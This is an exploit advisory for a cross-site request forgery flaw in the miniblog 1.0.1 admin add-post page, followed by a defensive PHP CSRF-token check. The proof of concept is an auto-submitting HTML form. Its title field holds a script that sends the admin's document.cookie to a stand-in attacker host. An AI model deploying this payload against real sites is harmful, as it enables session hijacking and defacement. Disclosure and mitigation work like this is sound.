miniblog 1.0.1 Cross Site Request Forgery
Posted on 10 October 2016
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork :
# Date : 09/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
# Software link : http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip

Description (admin login required) :

miniblog 1.0.1 is vulnerable to CSRF attacks that add, delete and edit articles in the sections.

Vulnerable page : http://localhost:8081/miniblog/adm/admin.php?mode=add

Dangerous point : if combined with XSS, it can be used to steal the admin's cookie information.

############### CSRF PoC ###############

<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:xampphtdocsminiblogadmedit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E" method="POST">
      <input type="hidden" name="data[post_title]" value="<script>location.href = AC/http://www.attackersite.com/stealer.php?cookie=AC/+document.cookie;</script>" />
      <input type="hidden" name="data[post_content]" value="tester" />
      <input type="hidden" name="data[published]" value="1" />
      <input type="hidden" name="miniblog_PostBack" value="Add" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

########################################
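
A defensive counterpart to the PoC above, added here as an example and not taken from miniblog's code: a per-session CSRF token check on the add-post postback, with the title HTML-encoded on output. The function names, the csrf_token field and the sample requests are assumptions; PHP 7 or later is assumed for random_bytes.

```php
<?php
// Hypothetical helpers; the names and the csrf_token field are assumptions,
// not miniblog's own code. Requires PHP 7+ (random_bytes).

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only when the request carries the token bound to this session.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Handle the postback the PoC forges: reject it unless the token matches.
function handle_add_post(array $session, array $post): array
{
    if (($post['miniblog_PostBack'] ?? '') !== 'Add') {
        return [400, 'not an add-post request'];
    }
    if (!csrf_valid($session, $post)) {
        return [403, 'missing or invalid CSRF token'];
    }
    $title = $post['data']['post_title'] ?? '';
    if (!is_string($title)) {
        return [400, 'malformed post_title'];
    }
    // A real handler would store $title here; it is encoded for HTML output.
    return [200, htmlspecialchars($title, ENT_QUOTES, 'UTF-8')];
}

// Constructed requests: the cross-site form versus the admin's own form.
$session = [];
$token = csrf_token($session);
$forged = ['miniblog_PostBack' => 'Add',
           'data' => ['post_title' => '<script>alert(1)</script>']];
$legit = $forged + ['csrf_token' => $token];
print_r(handle_add_post($session, $forged));
print_r(handle_add_post($session, $legit));
```

In a live handler the arrays would be $_SESSION and $_POST, and the admin form would emit csrf_token($_SESSION) as a hidden csrf_token field so that only pages served to the logged-in admin can submit it.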